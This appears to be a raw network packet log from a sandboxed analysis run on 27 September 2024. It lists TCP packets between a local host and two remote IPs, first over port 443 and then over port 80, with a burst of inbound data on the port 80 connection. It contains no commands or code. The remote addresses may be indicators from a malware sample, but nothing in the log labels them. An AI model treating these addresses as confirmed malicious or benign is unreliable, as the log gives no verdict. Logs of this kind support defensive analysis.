Sep 27, 2024 01:49:37.308293104 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.308316946 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.308368921 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.322050095 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.322067976 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.322163105 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.322177887 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.322361946 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.322381020 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.322398901 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.322453022 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.322458982 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.322505951 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.349325895 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.349375963 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.349402905 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:37.349414110 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.349472046 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.349740982 CEST	49726	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:37.349761009 CEST	443	49726	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:38.042327881 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.042371988 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:38.042447090 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.043292046 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.043306112 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:38.919755936 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:38.919894934 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.920500040 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.920506954 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:38.922424078 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.922427893 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:38.922549009 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:38.922554016 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:39.529369116 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:39.529406071 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:39.529468060 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:39.529794931 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:39.529809952 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:39.778716087 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:39.778832912 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:39.778865099 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:39.778892040 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:39.779864073 CEST	49727	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:39.779884100 CEST	443	49727	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:40.306997061 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:40.307092905 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:40.307671070 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:40.307681084 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:40.310352087 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:40.310368061 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.029136896 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.029167891 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.029228926 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.029328108 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.029328108 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.072105885 CEST	49728	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.072143078 CEST	443	49728	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.272681952 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.272756100 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.272830963 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.273298025 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.273320913 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.922810078 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.923116922 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.923793077 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.923815966 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:41.929814100 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:41.929825068 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:42.646337032 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:42.646372080 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:42.646454096 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.646462917 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:42.646523952 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.646523952 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.646898985 CEST	49729	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.646929979 CEST	443	49729	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:42.693480015 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.693548918 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:42.693645000 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.693907976 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:42.693924904 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:43.432467937 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:43.432580948 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:43.433129072 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:43.433151007 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:43.435673952 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:43.435684919 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:44.116827965 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:44.116920948 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:44.116980076 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:44.117026091 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:44.118253946 CEST	49730	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:44.118288040 CEST	443	49730	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:44.746495008 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:44.746560097 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:44.746721983 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:44.746925116 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:44.746938944 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.419461012 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.419609070 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.420213938 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.420223951 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422141075 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422144890 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422250032 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422259092 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422343969 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422354937 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422363997 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422378063 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422446966 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422446966 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422456980 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422480106 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422513008 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422557116 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422602892 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422744989 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422781944 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:45.422874928 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422888041 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:45.422909021 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:46.753009081 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:46.753098965 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:46.753124952 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:46.753174067 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:46.753465891 CEST	49731	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:46.753499031 CEST	443	49731	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:46.757395029 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:46.757447958 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:46.757519007 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:46.757718086 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:46.757730007 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:47.414057970 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:47.414294958 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:47.414722919 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:47.414735079 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:47.416723967 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:47.416732073 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:48.247350931 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:48.247421980 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:48.247442007 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:48.247487068 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:48.247487068 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:48.247530937 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:48.247735977 CEST	49733	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:48.247745991 CEST	443	49733	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:48.250670910 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.256190062 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.256304979 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.256485939 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.261224985 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876780033 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876796007 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876822948 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876841068 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876852036 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876863956 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876874924 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876874924 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.876887083 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876903057 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876914978 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.876939058 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.876951933 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.881728888 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.881742001 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.881752968 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.881763935 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.881803989 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.881828070 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970307112 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970367908 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970379114 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970386028 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970413923 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970448971 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970458984 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970484972 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970484972 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970513105 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970535994 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970783949 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970830917 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970835924 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970848083 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970859051 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970869064 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970880985 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970891953 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.970912933 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.970937014 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.971645117 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.971698999 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.971724033 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.971735001 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.971774101 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.971784115 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.971796036 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.971817017 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.971822023 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.971852064 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:48.972570896 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.972583055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:48.972625971 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.073292017 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073307991 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073362112 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073371887 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073383093 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073400021 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.073446989 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.073621988 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073643923 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073662996 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.073699951 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.073770046 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073813915 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.073821068 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.073854923 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.074039936 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074052095 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074062109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074081898 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.074095011 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074106932 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.074114084 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074126005 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074136972 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.074137926 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074151993 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.074152946 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.074172020 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.074199915 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.075016975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075028896 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075040102 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075062037 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.075089931 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.075095892 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075109959 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075120926 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075131893 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075143099 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075170994 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.075197935 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.075978041 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.075995922 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.076006889 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.076025963 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.076047897 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.076059103 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.076070070 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.076097965 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.159998894 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.160012960 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.160065889 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.163861990 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.163875103 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.163887024 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.163898945 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.163928986 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.163979053 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164009094 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164020061 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164031029 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164040089 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164051056 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164067030 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164100885 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164263964 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164293051 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164303064 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164316893 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164341927 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164364100 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164375067 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164386988 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164402962 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164458036 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164860010 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164907932 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164927959 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164938927 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164951086 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164962053 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.164988041 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.164998055 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165218115 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165227890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165239096 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165262938 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165286064 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165301085 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165313005 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165326118 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165345907 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165349007 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165361881 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165369987 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165371895 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165385008 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.165395021 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165427923 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.165452003 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166114092 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166163921 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166168928 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166177034 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166203022 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166203976 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166214943 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166224957 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166234970 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166244030 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166256905 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166258097 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166266918 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166269064 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166273117 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.166277885 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166301966 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.166320086 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.167020082 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167068958 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.167166948 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167177916 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167188883 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167200089 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167210102 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167212963 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:49.167222023 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:49.167227983 CEST	49734	80	192.168.2.8	147.45.44.104
